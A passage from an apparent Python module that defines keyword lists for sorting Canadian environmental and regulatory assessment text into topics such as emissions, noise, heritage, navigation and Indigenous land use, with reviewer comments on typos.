Black-footed Birds
Albatross
Phoebastria nigripes
Cassin\'s Auklet
Ptychoramphus aleuticus
Rusty Blackbird
Euphagus carolinus
Long-billed Curlew
Numenius americanus
Harlequin Duck
Histrionicus histrionicus
Peregrine Falcon anatum/tundrius
Falco peregrinus anatum/tundrius
Peregrine Falcon pealei subspecies
Falco peregrinus pealei
Barrow\'s Goldeneye
Bucephala islandica
Horned Grebe
Podiceps auritus
Western Grebe
Aechmophorus occidentalis
Evening Grosbeak
Coccothraustes vespertinus
Great Blue Heron fannini
fannini
Ardea herodias fannini
Red Knot islandica subspecies
Calidris canutus islandica
Ancient Murrelet
Synthliboramphus antiquus
Flammulated Owl
Otus flammeolus
Short-eared Owl
Asio flammeus
Red-necked Phalarope
Phalaropus lobatus
Band-tailed Pigeon
Patagioenas fasciata
Yellow Rail
Coturnicops noveboracensis
Buff-breasted Sandpiper
Tryngites subruficollis
Baird\'s Sparrow
Ammodramus bairdii
Grasshopper Sparrow pratensis subspecies
Ammodramus savannarum pratensis
Savannah Sparrow princeps subspecies
Passerculus sandwichensis princeps
Eastern Wood-pewee
Contopus virens
Coastal Tailed Amphibians
Ascaphus truei
Northern Leopard Frog
Lithobates pipiens
Red-legged Frog
Rana aurora
Coeur d\'Alene Salamander
Plethodon idahoensis
Wandering Salamander
Aneides vagrans
Western Tiger Salamander
Ambystoma mavortium
Great Plains Toad
Anaxyrus cognatus
Western Toad
Anaxyrus boreas
Western Toad
Anaxyrus boreas
Rubber Boa
Charina bottae
Milksnake
Lampropeltis triangulum
Western Yellow-bellied Racer
Coluber constrictor mormon
Prairie Rattlesnake
Crotalus viridis
Eastern Ribbonsnake
Thamnophis sauritus
Five-lined Skink
Plestiodon fasciatus
Prairie Skink
Plestiodon septentrionalis
Western Skink
Plestiodon skiltonianus
Eastern Musk Turtle
Sternotherus odoratus
Eastern Painted Turtle
Chrysemys picta picta
Midland Painted Turtle
Chrysemys picta marginata
Northern Map Turtle
Graptemys geographica
Snapping Turtle
Chelydra serpentina
Western Painted Turtle
Chrysemys picta bellii
Lake Erie Watersnake
Nerodia sipedon insularum
Bigmouth Buffalo
Ictiobus cyprinellus
Channel Darter
Percina copelandi
Dolly Varden
Salvelinus malma malma
Banded Killifish
Fundulus diaphanus
Upper Great Lakes Kiyi
Coregonus kiyi kiyi
Northern Brook Lamprey
Ichthyomyzon fossor
Silver Lamprey
Ichthyomyzon unicuspis
Cutlip Minnow
Exoglossum maxillingua
Grass Pickerel
Esox americanus vermiculatus
River Redhorse
Moxostoma carinatum
Rougheye Rockfish type I
Sebastes sp. type I
Rougheye Rockfish type II
Sebastes sp. type II
Yelloweye Rockfish
Sebastes ruberrimus
Yelloweye Rockfish
Sebastes ruberrimus
Columbia Sculpin
Cottus hubbsi
Deepwater Sculpin
Myoxocephalus thompsonii
Rocky Mountain Sculpin
Cottus sp.
Shorthead Sculpin
Cottus confusus
Bluntnose Sixgill Shark
Hexanchus griseus
Bridle Shiner
Notropis bifrenatus
Giant Threespine Stickleback
Gasterosteus aculeatus
Unarmoured Threespine Stickleback
Gasterosteus aculeatus
Green Sturgeon
Acipenser medirostris
Lake Sturgeon
Acipenser fulvescens
Shortnose Sturgeon
Acipenser brevirostrum
Mountain Sucker
Catostomus platyrhynchus
Spotted Sucker
Minytrema melanops
Northern Sunfish
Lepomis peltastes
Longspine Thornyhead
Sebastolobus altivelis
Tope
Galeorhinus galeus
Blackstripe Topminnow
Fundulus notatus
Bull Trout
Salvelinus confluentus
Bull Trout
Salvelinus confluentus
Westslope Cutthroat Trout
Oncorhynchus clarkii lewisi
Warmouth
Lepomis gulosus
Atlantic Wolffish
Anarhichas lupus
Brook Floater
Alasmidonta varicosa
Warty Jumping-slug
Hemphillia glandulosa
Haida Gwaii Slug
Staala gwaii
Pygmy Slug
Kootenaia burkei
Sheathed Slug
Zacoleus idahoensis
Threaded Vertigo
Nearctula sp.
Magnum Mantleslug
Magnipelta mycophaga
Wavy-rayed Lampmussel
Lampsilis fasciola
Yellow Lampmussel
Lampsilis cariosa
Mapleleaf
Quadrula quadrula
Rocky Mountain Ridged Mussel
Gonidea angulata
Olympia Oyster
Ostrea lurida
Eastern Pondmussel
Ligumia nasuta
Rainbow
Villosa iris
Yellow-banded Bumble Bee
Bombus terricola
Vivid Dancer
Argia vivida
Greenish-white Grasshopper
Hypochlora alba
Red-tailed Leafhopper
Aflexia rubranura
Red-tailed Leafhopper
Aflexia rubranura
Mormon Metalmark
Apodemia mormo
Monarch
Danaus plexippus
Pale Yellow Dune Moth
Copablepharon grandis
Sonora Skipper
Polites sonora
Pygmy Snaketail
Ophiogomphus howei
Georgia Basin Bog Spider
Gnaphosa snohomish
Dune Tachinid Fly
Germaria angustata
Weidemeyer\'s Admiral
Limenitis weidemeyerii
Blue Ash
Fraxinus quadrangulata
Crooked-stem Aster
Symphyotrichum prenanthoides
Nahanni Aster
Symphyotrichum nahanniense
White-top Aster
Sericocarpus rigidus
Vancouver Island Beggarticks
Bidens amplissima
Western Blue Flag
Iris missouriensis
Buffalograss
Bouteloua dactyloides
American Hart\'s-tongue Fern
Asplenium scolopendrium
Coastal Wood Fern
Dryopteris arguta
Goldencrest
Lophiola aurea
Houghton\'s Goldenrod
Solidago houghtonii
Riddell\'s Goldenrod
Solidago riddellii
Mackenzie Hairgrass
Deschampsia mackenzieana
Common Hoptree
Ptelea trifoliata
Tuberous Indian-plantain
Arnoglossum plantagineum
Dwarf Lake Iris
Iris lacustris
Eastern Lilaeopsis
Lilaeopsis chinensis
Lyall\'s Mariposa Lily
Calochortus lyallii
Fernald\'s Milk-vetch
Astragalus robbinsii var. fernaldii
Water Pennywort
Hydrocotyle umbellata
Beach Pinweed
Lechea maritima
Yukon Podistera
Podistera yukonensis
Hill\'s Pondweed
Potamogeton hillii
Hairy Prairie-clover
Dalea villosa
Prototype Quillwort
Isoetes prototypus
Redroot
Lachnanthes caroliniana
Climbing Prairie Rose
Rosa setigera
Swamp Rose-mallow
Hibiscus moscheutos
New Jersey Rush
Juncus caesariensis
Spiked Saxifrage
Micranthes spicata
Baikal Sedge
Carex sabulosa
Tubercled Spike-rush
Eleocharis tuberculosa
Floccose Tansy
Tanacetum huronense var. floccosum
Pitcher\'s Thistle
Cirsium pitcheri
Athabasca Thrift
Armeria maritima interior
Victorin\'s Water-hemlock
Cicuta maculata var. victorinii
Yukon Wild Buckwheat
Eriogonum flavum var. aquilinum
Felt-leaf Willow
Salix silicicola
Sand-dune Short-capsuled Willow
Salix brachycarpa var. psammophila
Turnor\'s Willow
Salix turnorii
Dwarf Woolly-heads
Psilocarphus brevissimus
Large-headed Woolly Yarrow
Achillea millefolium var. megacephalum
Banded Mosses
Cord-moss
Entosthodon fascicularis
Columbian Carpet Moss
Bryoerythrophyllum columbianum
Twisted Oak Moss
Syntrichia laevipila
Tiny Tassel
Crossidium seriatum
Frosted Lichens
Glass-whiskers
Sclerophora peronella
Flooded Jellyskin
Leptogium rivulare
Blue Felt Lichen
Degelia plumbea
Boreal Felt Lichen
Erioderma pedicellatum
Cryptic Paw Lichen
Nephroma occultum
Oldgrowth Specklebelly Lichen
Pseudocyphellaria rainierensis
Peacock Vinyl Lichen
Leptogium polycarpum
Mountain Crab-eye
Acroscyphus sphaerophoroides
Western Waterfan
Peltigera gowardii"""
# Keyword/phrase list for matching "air emissions" topics in regulatory text.
# Spelling and case variants (e.g. "groundlevel" / "ground-level") are
# deliberate, to widen string matching.
# NOTE(review): "gm3" looks like a mangled concentration unit (e.g. "ug/m3"
# or "g/m3") — confirm against the original keyword source.
Air_emissions = """Air Emissions
Air
CAC
criteria air contaminant
Emissions
Construction equipment
vehicular emissions
CCME
Volatile organic compounds
Combustion
Leak
Fugitive emissions
Flaring
Incinerating
Averaging Period
incineration
Smoke
Venting
Pollute
pollutant
National Pollutant Release Inventory
Exceedance
Release
Ambient
Hydrogen sulphide
H2S
particulate
so2
sulfur dioxide
mercaptans
dust
NO2
ozone
nitrogen dioxide
oxides of nitrogen
NOX
Clean Air Act
concentration
groundlevel
ground-level
gm3
receptor"""
# Keyword/phrase list for matching greenhouse-gas / climate-change topics.
# Entries are search terms; hyphenated and unhyphenated variants
# (e.g. "offset" / "off-set", "net zero" / "net-zero") are intentional.
Greenhouse_gas_emissions = """GHG Emissions and Climate Change
greenhouse
greenhouse gas
green house gas
greenhouse gases
climate change
point source
area source
release
leak
burning
assumption
offset
off-set
International Standards Organization
ISO
ghg
ozone
global warming
Assessment of Upstream GHG Emissions
upstream
quantitative
throughput
net zero
net-zero
Environment and Climate Change Canada (ECCC)
Threshold
CO2
Carbon dioxide
CO2 equivalent
Methane
ch4
steam
hydrogen
combustion
fugitive
venting
flaring"""
# Keyword/phrase list for matching acoustic-environment / noise topics.
# Entries are search terms, so common variants are included deliberately.
# Added "compressor station" — the standard pipeline-industry term — while
# keeping the original "compression station" variant for compatibility.
Noise = """Acoustic Environment
Sound
Noise
Equipment
Frequency
Inaudible
Audible
Decibel
Notification
Noise control
Noise management
loud
quiet
db
acoustic
construction traffic
blasting
machinery
gas plant
compression station
compressor station"""
# Keyword/phrase list for matching environmental-obligation topics
# (statutes, policies, and jurisdiction terms).
# Removed an accidental duplicate "Federal Wetland Policy" entry that
# appeared both mid-list and as the final line.
Environmental_Obligations = """Environmental Obligations
MBCA
migratory birds convention act
SARA
Species at risk act
DFO
Fisheries and Oceans Canada
Federal Wetland Policy
Hinder
Federal
Provincial
Territorial
International
Policy
Plan
Framework
law
legislation
regulatory
regulations"""
# Newline-separated keyword/phrase list for the Traditional Land and Resource
# Use topic. First line is the topic label; the bulk of the list is an
# extensive enumeration of Indigenous nation, band, and community names
# (matched after stemming by the loop at module bottom). This nation list is
# substantially repeated in another constant later in this module.
Indigenous_land_water_and_air_use = """Traditional Land and Resource Use
TLRU
traditional
Traditional ecological knowledge
Traditional Knowledge
Indigenous Knowledge
Aboriginal Knowledge
Aboriginal
Native
Indian
First Peoples
Treaty Lands
Indigenous Land
Traditional Territory
Oral Indigenous Knowledge
settlement area
IK
OIK
TK
access to lands
access to resources
Hunt
hunting
fishing
Harvest
harvesting
Culturally significant
Culturally modified tree
Gather
Berries
Medicine
Berry picking
Indigenous
Elder
Knowledge Keeper
Trapping
trap
Ceremony
ceremonies
Medicinal
Cultural
Old growth
Spirit Bear
Spirit animal
spiritual
sacred area
sacred sites
metis
Métis
first nations
shxw’ōwhámel
lheidlit’enneh
whispering pines first nation
inuit
elders
kumik elder lodge
tribal
Abenaki
Innu
Montagnais-Naskapi
Oneida
Ahousaht
Interior Salish
Onondaga
Algonquin
Inuinnait
Copper Inuit
Pacheenaht
Assiniboine
Inuvialuit
Mackenzie Inuit
Petun
Atikamekw
Kainai
Piikani
Peigan
Baffin Island Inuit
K'asho Got'ine
Saldermiut Inuit
Beothuk
Kaska Dena
Sahtu Got'ine
Bearlake
Blackfoot Confederacy
Blackfoot
Kivallirmiut
Caribou Inuit
Secwepemc
Shuswap
Cayuga
Ktunaxa
Kootenay
Sekani
Central Coast Salish
Kwakwaka'wakw
Kwakiutl
Seneca
Coast Salish
Kyuquot and Checleseht
Shuta Got'ine
Cree
Labradormiut
Labrador Inuit
Siksika
Dakota
Lilwat
Lillooet
Slavey
Dakelh
Lingit
Tlingit
Stoney-Nakoda
Dane-zaa
Beaver
Syilx
Okanagan
Dene
Mi'kmaq
Tagish
Denesuline
Chipewyan
Mohawk
Tahltan
Ditidaht
Mowachaht-Muchalaht
Tla-o-qui-aht
Clayoquot
Ehattesaht
Nahani
Tlicho
Dogrib
Gitxsan
Gitksan
Netsilingmiut
Netsilik Inuit
Toquaht
Gwich'in
Neutral Confederacy
Tr'ondëk Hwëch'in (Han)
Haida
Nicola-Similkameen
Tseshaht
Sheshaht
Haisla
Kitamaat
Nisga'a
Tsilhqot'in
Chilcotin
Haudenosaunee
Six Nations
Iroquois
Nlaka'pamux
Thompson
Tsimshian
Heiltsuk
Northern Georgia Strait Coast Salish
Tsuut'ina
Sarcee
Hesquiaht
Nuchatlaht
Tutchone
Hupacasath
Opetchesaht
Nunavimmiut
Ungava Inuit
Uchucklesaht
Huu-ay-aht
Nuu-chah-nulth
Ucluelet
Huron-Wendat
Nuxalk
Bella Coola
Wolastoqiyik
Maliseet
Iglulingmuit
Iglulik Inuit
Odawa
Wetal
Tsetsaut
Inuit
Ojibwa
Yellowknives
popkum first nation
leq’á:mel first nation
alexander first nation
samson cree first nation
o’chiese first nation
ermineskin cree nation
enoch cree nation
indian
eskimo
Crown land
?Akisq'nuk
?Esdilagh
'Namgis
Aamjiwnaang
Fort Liard
Adams Lake
Ahousaht
Ahtahkakoop
&Abrevethélets
Aklavik
Tobacco Plains
Ahkwesáhsne Kanien'kehá:ka
Alderville
Alexander
Alexis Nakota Sioux
Tsi Del Del
Alkali Lake
Anaham
Anderson Lake
Animbiigoo Zaagi'igan Anishinaabek
Big Island
Anishinabe of Wauzhushk Onigum
St. Mary's
Ikpiarjuk
Tsiigehtchic
Aseniwuche Winewak
Ashcroft
Athabasca Chipewyan
Whitefish Lake
Attawapiskat
Aundeck-Omni-Kaning
Grise Fiord
Awaetlala
Peerless Trout
Barren Lands
Batchewana
Beardy's and Okemasis'
Bearskin Lake
Beausoleil
Beaver
Beaver Lake
Scia'new
Fort Norman
Behdzi Ahda"
Heíltsuk
Nuxalk
Big Cove
Joseph Bighead Cree
Big River
Bigstone Cree
Birch Narrows
Birdtail Sioux
Walpole Island
Stony Rapids
Little Black River
Marcel Colomb
Blood
Bloodvein
Blueberry River
Montana Cree
St'uxtews
Boothroyd
Boston Bar
Bridge River
Brokenhead Ojibway
Wet'suwet'en
Qikiqtarjuaq
Brunwick House
Tjipogtotjg
Buffalo Point
Buffalo River Dene
Oxford House
Burns Lake
Burnt Church
Tsleil Waututh
Calling Lake
Cambridge Bay
Wei Wai Kum
Stswecem'c/Xgat'tem
Canoe Lake Cree
Canupawakpa Dakota
Kinngait
Cape Mudge
Carcross/Tagish
Ceg-a-Kin
Cayoose Creek
Ch'iyáqtel
Chacachas
Chakastaypasin
Seton Lake
Champagne and Aishihik
Chawathil
Cheam
Chehalis
Chemainus
Chemawawin Cree
Cheslatta Carrier
Big Bear
Janvier
Chisasibi
Tla-o-qui-aht
Clearwater River Dene
Clyde River
Cold Lake
Coldwater
Comox
Constance Lake
Cook's Ferry
Cote
Cowessess
Cowichan
O-Chi-Chak-Ko-Sipi
Mikisew Cree
Cross Lake
Cumberland House
Dakota Plains Wahpeton
Dakota Tipi
Dauphin River
Day Star
Daylu Dena Council
Skeetchestn
Dease River
Dechi Laot'i
Deh Gah Gotie Dene
Fort Franklin
Dene Tha'
Fort Resolution
Nitinaht
Tli Cho
Doig River
Douglas
Driftpile
Duncan's
Dzawada'enuxw
Ebb and Flow
Natoaganeg
Ehattesaht
Kesyehot'ine
Enoch
Ermineskin Cree
Esdilah
Esquimalt
Fairford
Fisher River Cree
Fishing lake
Flying Dust
Fond du Lac Denesuline
Fort Churchill
Fort Folly
Fort Good Hope
Fort Albany
Fort Alexander
Smith's Landing
Fort George
Fort MacKay
Fort McMurray
Fort McPherson
Fort Nelson
Fort Rupert Band
Liidlii Kue
Fort Smith
Fort Ware
Xaxl'ip
Fox Lake Cree
Nadleh Whut'en
Frog Lake
Gamblers
Rae Lakes
Garden Hill
Gesgapegiag
Gingolx
Gitanmaax
Kitwancool
Gitg'a'ata
Kitkatla
New Aiyansh
Gitsegukla
Kitselas
Gitwangak
Gitwinksihlkw
Gitxsan
Glen Vowell
God's Lake
Manto Sipi
George Gordon
Grand Rapids
Grouard
Gwa'Sala-Nakwaxda'xw
Gwawaenuk
Hagwilget
Haisla
Halalt
Halfway River
Hatchet Lake
Hay River
Heart Lake
Hesquiaht
Tenlenaitmux
Wanipigow
Holman
Homalco
Horse Lake
Hupacasath
Huu-ay-aht
Iglulik
Indian Birch
Indian Island
Inuvik
Iqaluit
Iskut
Ministikwan
Kinonjeoshtegon
James Smith
Jean Marie River
Muskoday
K'ómoks
Ka'a'gee Tu
Ka:'yu:'k't'h'/Che:k:tles7et'h'
Kahkewistahaw
Kahnawà:ke
Kamloops
Kanaka Bar
Kanehsatà:ke
Rankin Inlet
Kaska Nation
Katzie
Poor Man or Lean Man
Keeseekoose
Riding Mountain Band
Kehewin Cree
Kelly Lake
Kelly Lake Cree
Kelly Lake Métis Settlement
Lake Harbour
Kinistin
Kispiox
Kitasoo/Xai'Xais
Kitsumkalum
Klahoose
Kluane
Kluskus
Kwanlin Dun
Kwantlen
Kwaw-Kwaw-Apilt
Kwiakah
Kwicksutaineuk-ah-kwaw-ah-mish
Kwikwetlem
Lac La Martre
Lac La Ronge
Leq'á:mel
Lakalzap
Lake Babine
Lake Cowichan
Lake Manitoba
Lake St. Martin
Lax-Kw'alaams
Lean Man
Lekwungen
Lhtakot'en
Liard
Mount Currie
T'it'q'et
Restigouche
Little Black Bear
Little Grand Rapids
Little Pine
Little Red River Cree
Little Salmon Carmacks
Little Saskatchewan
Skwlax
Long Plain
Loon River
Louis Bull
Yaqan Nukiy
Lower Nicola
Lower Similkameen
Lubicon Lake
Lucky Man
Snowdrift
Lyackson
Lytton
Madawaska Maliseet
Makwa Sahgaiehcan
Malahat
Maliseet
Mamalilikulla-Qwe'Qwa'Sot'Em
Manawan
Mathias Colomb
Matsqui
McLeod Lake
Metlakatla
Miawpukek Mi'kamawey Mawi'omi
La Nation Micmac de Gespeg
Mistawasis
Mittimatalik
Mississaugas of the New Credit
Kenhtë:ke Kanyen'keh·:ka
Montreal Lake Cree
Moose Lake
Moosomin
Moricetown
Mosquito, Grizzly Bear's Head, Lean Man
Mowachaht/Muchalaht
Muscowpetung
Utshimassit
Muskeg Lake
Muskowekwan
Musqueam
N'ahadehe
Na-Cho Nyak Dun
Nak'azdli
Nanoose
Nazko
Nee Tahi Buhn
Nekaneet
Xeni Gwet'in
Nisichawayasihk
Neskonlith
Nicomen
Nisga'a Nation
Nooaitch
Northlands Denesuline
Northwest Angle No. 33
Northwest Angle 37
Simpcw
Norway House
Nuchatlaht
Nunavut
Nuwitti
Nut Lake
Oak Lake
O'Chiese
Sioux Valley Dakota
Ocean Man
Ochapowace
Opitciwan
Odanak
Ohamil
Okanagan
Okanese
Old Masset Village Council
Willow Crees
Onion Lake
Opaskwayak Cree
O-Pipon-Na-Piwin Cree
Oregon Jack Creek
Oromocto
Osoyoos
Oujé Bougoumou Cree
Oweekeno
Pacheedaht
Pangnirtung
Pasqua
Pauingassi
Paul
Paulatuk
Pauquachin
Ts'kw'aylaxw
Peepeekisis
Peguis
Pehdzeh Ki
Selkirk
Peigan
Pelican Lake
Penelakut
Penticton
Peter Ballantyne
Peter Chapman
Peters
Pheasant Rump Nakota
Piapot
Algonquins of Pikwákanagán
Pine Creek
Piyesiw-awasis
Popkum
Poplar River
Poundmaker
Prophet River Band, Dene Tsaa Tse K'Nai
Qalipu Mi'Kmaq
Qausuittuq
Qayqayt
Qualicum
Quatsino
Rat Portage
Red Earth
Red Pheasant
Red Sucker Lake
Rolling River
Roseau River Anishinabe
Ross River
Sachs Harbour
Saddle Lake Cree
Saik'uz
Sakimay
Samahquam
Sambaah Ke Dene
Samson
Sandy Bay
Sapotaweyak
Saulteau
Saulteaux
Sawridge
Scowlitz
Seabird Island
Shishálh
Semiahmoo
Secwepemc
Shackan
Shamattawa
Shoal Lake
Shxwhá:y Village
Sîkîp Sâkahikan
Siksika
Sinixt
Siska
Six Nations
Skatin
Skawahlook
Skidegate
Skin Tyee
Skulkayn
Skownan
Skuppah
Skwah
Tla'Amin
Snuneymuxw
Soda Creek
Soowahlie
Splatsin
Tataskweyak Cree
Spuzzum
Squamish
Squiala
St. Theresa Point
Standing Buffalo Dakota
Star Blanket
Stellat'en
Yunesit'in
Stoney Nakoda
Stony Knoll
Sturgeon Lake
Sturgeon Lake Cree
Sucker Creek, AB
Sucker Creek, ON
T'exelc
Semá:th
Sunchild
Swan Lake
Swan River
Sweetgrass
Ta'an Kwäch'än
Tahltan
Takla Lake
Taku River Tlingit
Tallcree
Teetl'itzheh
Teslin Tlingit
The Key
Tl'azt'en
Tl'esqox
Tli Cho Government
Turner Island
Tobique
Valley River
Toquaht
T'Sou-ke
Tr'on dëk Hwëch'in
Ts'ueh Nda
Tsartlip
Tsawout
Tsawwassen
Tsay Keh Dene
Tseshaht
Tseycum
Tsuu T'ina
Tuktoyaktuk
Uchucklesaht
Ucluelet
Ulkatcho
Union Bar
Upper Nicola
Upper Similkameen
Vuntut Gwitchin
Wahpeton Dakota
War Lake
Wasagamack
Waswanipi Cree
Waywayseecappo
Wemotaci
Nation Huronne Wendat
Westbank
West Moberly
Wet'suwet'en Nation
Whispering Pines/Clinton
White Bear
White River
Whitecap Dakota
Atikameg
Witchekan Lake
Wolastokwik NeGoot-Gook
Wôlinak
Wood Mountain Lakota
Woodland Cree
Wrigley
Yeqwyeqwí:ws
Yale
Yekooche
Yellowknives Dene
York Factory
Columbia Lake
Alexandria
Chippewas of Sarnia
Acho Dene Koe
Sexqeltqin
Aitchelitz
Akun'kunik'
Akwesasne
Redstone Band
Esketemc
Tl'etinqox-t'in
N'quatqua
Lake Nipigon Ojibway
Anishinaabeg of Naongashiing
Aqam
Arctic Bay
Arctic Red River
Grande Cache
Atikameksheng Anishnawbek
Sucker Creek
Ausuittuq
Da'naxda'xw
Bald Hill
Beardy's and Okemasis
Beaver Lake Cree
Beecher Bay
Tulita Dene
Bella Bella
Bella Coola
Elsipogtog
Naongashiing
Big Island Lake
Turnor Lake
Bkejwanong
Black Lake Denesuliné
Makadewaagamijiwanong
Black Sturgeon
Kainai
Bobtail
Bonaparte
Nxwisten
Broman Lake
Broughton Island
Buctouche
Bunibonibee
Ts'il kaz koh
Esgenoopetitj
Burrard
Jean Baptiste Gambler
Ikaluktutiak
Campbell River
Canoe Creek
Cape Dorset
We Wai Kai
Carry the Kettle Nakota
Sekw'el'was
Ch'yaqtel
Tsal'alh
Chi:yo:m
Sts'Ailes
Stz'uminus
Chemawawin
Chief Big Bear
Chipewyan Prairie
Clayoquot
Kangiqtugaapik
Crane River
Cree Chip
Pimicikamak
Waskahikanihk Cree Cree
Lower Post
Deadman's Creek
Wekwèti
Fort Providence
Déline
Deninu K'ue
Ditidaht
Dog Rib Rae
Xa'xtsa
Tsawataineuk
Eel Ground
English River
Ermineskin
Pinaymootang
Fisher River
Sayisi Dene
K'asho Got'ine
Sagkeeng
Fort Fitzgerald Dene
Lheidli T'enneh
Kwawkewlth
Fort Simpson
Salt River 195
Kwadacha
Fountain
Fox Lake
Fraser Lake
Gamèti
Gitanyow
Hartley Bay
Gitkxaala
Gitlakdamix
Gits'ilaasu
God's Lake Narrows
Manto Sipi Cree
Goodfish
Misipawistik Cree
Kapawe'no
Kitamaat
K'atlodeeche
High Bar
Hollow Water
Uluqsaqtuuq
Xwémalhkwu
Ohiaht
Wuskwi Sipihk
Island Lake
Jackhead
Tthe'k'ehdeli
John Smith
Comoks
Kakisa
Kyuquot
Tk'emlúps
Kangiqliniq
Kawacatoose
Keeseekoowenin
Kimmirut
Lhoosk'uz Dene
Kwikwasut'inuxw Haxwa'mis
Wha Ti
Lakahahmen
Laxgalt'Sap
Nat'oot'en
Lapatack Cree
Kawacatoose or Mosquito, Grizzly Bear's Head, Lean Man
Songhees
Red Bluff
Lil'wat
Lillooet
Listuguj
Little Shuswap Lake
Lower Kootenay
Lù'an Män Ku Dän
Lutsel K'e Dene
Maliseet of Viger
Manouane
Mathias Colomb Cree
Tsek'hene
Purtujuq
Mohawks of the Bay of Quinte
Montreal Lake
Mosakahiken
Witset
Mushuau Innu
Petequakey
Nahanni Butte
Nak'azdli Whut'en
Snaw-naw-as
Nemaiah
Nelson House
Northlands
Northwest Angle 33
Northwest Angle No. 37
North Thompson
Norway House Cree
Tlatlasikwala
Yellow Quill
Oak River
Obedjiwan
Shxw'ow'hamel
One Arrow
The Pas
O-Pipon-Na-Piwin
Oujé Bougoumou
Wuikinuvx
Pacheenaht
Panniqtuuq
Pavillion
Pelly Band
Piikani
Peter Ballantyne Cree
Skw'atels
Golden Lake
Thunderchild
Poor Man
Prophet River
Resolute Bay
Onihcikiskowapowin
Stony Creek
Zagime Anishinabek
Trout Lake
White Mud River
Sapotaweyak Cree
Sq'éwlets
Sechelt
Waterhen Lake
Sq'ewá:lxw
Sq'ewq&emacryl
Water Hen
Sliammon
Xatsu'll/Cm'etem
Spallumcheen
Tataskweyak
Stone
Young Chipeeweyan
Sukwekwin
Sumas
Tetlit Gwich'in
Toosey
Tlowitsis-mumtagila
Tootinaowaziibeeng
T'Souke
West Point
Tyendinaga
Weymontachi
Whitefish
Yakweakwioose
Akisq'nuk
Alexis Creek
Gwichya Gwich'in
Atikameksheng Anishnawbek
Tanakteuk
Kapuskwatinak
Begaee Shuhagot'ine
Black River
Xwísten
Tzeachten
Chalath
Waskahikanihk Cree
Poplar House People
Kwakiutl
God's River
Misipawistik
Ulukhaktok
Ministikwan Lake Cree
Mosquito
Pukatawagan
Pond Inlet
Mosakahiken Cree
Necoslie
Whitefish Bay
South Indian Lake
Pikwàkanagàn
Dene Tsaa Tse K'Nai
Saddle Lake
Shoal River
Skowkale
Split Lake
Williams Lake
Tlowitsis
Whitefish Lake, AB
Whitefish Lake (Atikameg)
Peerless Lake
Grizzly Bear's Head
Animakhee Wazhing
Whitefish Lake, ON"""
# Newline-separated keyword/phrase list for the electromagnetism / corona
# discharge topic; first line is the topic label.
# Fix: the list contained only the misspellings "eletric" and "inteference",
# which Porter-stem to tokens ("eletr", "intefer") that can never match the
# correctly spelled words in real documents. The correct spellings are added
# as additional keywords; the misspelled originals are deliberately retained
# so any previous matches are preserved (backward compatible — list only grows).
Electricity_and_electromagnetism = """Electromagnetism and Corona Discharge
electromagnetism
voltage
ozone concentration
eletric
electric
electricity
magnetic
magnetism
corona
discharge
magnetic
power line
powerline
electromagnetic
signals
maximum load
induction
frequency
inteference
interference
radio interference
television interference
foul weather
ambient conditions
240 kV"""
# Newline-separated keyword/phrase list for the human occupancy / resource use
# topic; first line is the topic label.
# NOTE(review): "orchid" and "sport finishing" look like typos for
# "orchards" / "sport fishing" — confirm intent before changing, since these
# strings are matched against stemmed document text.
Proximity_to_people = """Human Occupancy and Resource Use
Proximity to people
residents
human Occupancy
resource use
consultation
livestock
human
male
female
men
women
boy
girl
father
mother
gender
rural
urban
residential
reserve
crops
orchards
orchid
vineyards
agriculture
recreation
park
scenic
parks canada
conservation area
international biological program
ecological reserves
preserves
industrial
commercial
agreement forests
timber sales area
controlled forest
managed forest
registered hunting
recognized hunting
trapping
guiding areas
commercial fishing
sport finishing
water reserves
water licenses
water supply
municipal
infrastructure
rail
navigable waterways
TLU Impact assessment"""
# Newline-separated keyword/phrase list for the heritage-resources topic;
# first line is the topic label. Contains both UK/US spelling variants
# (archaeology/archeology) deliberately, to match either form.
# NOTE(review): "Onatario Heritage act" and "Acheological impact assessment"
# look like typos ("Ontario", "Archeological") — confirm before changing.
Archaeological_paleontological_historical_and_culturally_significant_sites_and_resources = """Heritage Resources
Heritage Resources
Heritage
Archaeology
Archeology
Archaeological
Archeological
Paleontology
Paleontological
Historic
Historic resource
Historic site
Hunting camp
Trail
Culturally significant
grading
trenching
excavating
drilling
clearing of vegetation
Dig site
Archaeologist
Archeologist
undiscovered
architectural
grave site
burial site
medicine wheel
culturally modified tree
CMT
archaeological report
archeological report
archaeological assessment
archeological assessment
pre-contact
post-contact
human remains
Heritage Conservation Branch
Ontario ministry of tourism culture and sport
Heritage resources act
Alberta Ministry of Culture Multiculturalism and Status of Women
British Columbia Archeology Branch
Heritage conservation act
Historic sites and monuments act
Historic resources act
Heritage property act
Haida Gwaii Reconciliation act
Heritage Manitoba act
Onatario Heritage act
Loi sur les biens culturels
Heritage place protection act
Archeological sites protection act
richesse du patrimoine
permis de recherche archéologique
Heritage resources impact assessment
HRIA
Acheological impact assessment
AIA
Nunavut territorial lands use regulations
Northwest territories historical advisory Board
Yukon heritage resources Board
oldforest
old forest"""
# Newline-separated keyword/phrase list for the navigation / navigation-safety
# topic; first line is the topic label.
Human_access_to_boats_and_waterways = """Navigation and Navigation Safety
Navigation
Nonnavigable
Navigation protection activities
Guide lines
Guide wires
Signage
Waterway
Crossing
crossing plan
impacting Navigation
dewatering of navigable waters
navigable waters
navigable waterway
navigable
navigate
watercourse
watercourse crossing
water crossing
crossing methodology
horizontal directional drilling
HDD
bridge
marine
marine terminal
waterway user
recreational waterway user
navigational use
tributary
tourism
tourist
guide outfitter
outfitter
angler
canoe
kayak
boat
sailing
sail
Fisheries and Oceans Canada
Navigation Protection Act
navigable watercourse
navigation Safety
scheduled waters
non-scheduled waters
recreation-related navigation
commercial-related navigation
watercourse users
waterway users
watercourse Crossing
crossing method
trenchless crossing
trenched crossing
navigation hazard
exposed instream
buoyancy issues
upstream
downstream
warning signs
warning Signage
instream
temporary vehicle crossing
bed
banks
preconstruction contours
hydraulic characteristics
erosion and sediment control
runoff
temporary crossing structure
fording
streambank
streambed
side containment"""
# Newline-separated keyword/phrase list for the social and cultural well-being
# topic; first line is the topic label.
# NOTE(review): "cultrual groups" looks like a typo for "cultural groups" —
# confirm before changing (keywords are matched after stemming).
Impact_to_social_and_cultural_well_being = """Social and Cultural Well-Being
Social
Routing
socio-cultural
cultural
well-being
well being
families
workers
residents
community
traditions
alcohol
drugs
substance abuse
stresses
household cohesion
illegal
disruptive activities
privacy
inhabited
human behaviour
human behavior
workforce
peak workforce
mobile workforce
discipline measures
traffic control management
project schedule
Code of conduct policy
alcohol and drug policy
Indigenous service providers
regional service providers
social service
cultural service
social agency
cultural agency
cultrual groups"""
# Newline-separated keyword/phrase list for the human health and aesthetics
